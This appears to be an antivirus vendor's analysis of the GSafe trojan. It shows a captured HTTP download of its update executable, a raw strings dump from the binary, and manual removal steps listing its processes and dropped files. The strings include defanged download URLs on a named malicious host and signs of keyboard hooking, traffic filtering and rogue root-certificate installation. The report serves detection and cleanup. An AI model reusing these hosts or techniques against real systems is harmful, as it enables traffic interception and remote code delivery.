GET /bin/gsafe_update.exe?dummy=573 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Wed, 31 Dec 2014 11:01:01 GMT
ETag: "59c21d0-383c7-50b8105e2f540"
Accept-Ranges: bytes
Content-Length: 230343
X-Cache: BYPASS

The Trojan connects to the servers at the following location(s):

GSafe.exe_1268:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.gencolabsllc.com/services/
_rules.php
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start GSafe
cmd.exe /c net stop GSafe
c:\log.log
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nj_update.exe:1544
    GSafe.exe:832
    GSafe.exe:1596
    net1.exe:540
    net1.exe:440
    net1.exe:1100
    net.exe:1236
    net.exe:484
    net.exe:240
    %original file name%.exe:1244
    gsafe_setup.exe:1800

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Temp\nsx85.tmp (1568 bytes)
    %WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
    %WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
    %WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
    %WinDir%\Temp\P_RuleList.txt (80 bytes)
    %WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
    %WinDir%\Temp\nj_update.exe (18319 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
    %System%\drivers\gfilterdrv.sys (55 bytes)
    %Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
    %Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
    %Program Files%\GSafe\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
    %Program Files%\GSafe\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
    %Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
    %Program Files%\GSafe\nfapi.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\GSafe\libeay32.dll (35507 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
    %Program Files%\GSafe\GSafe.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
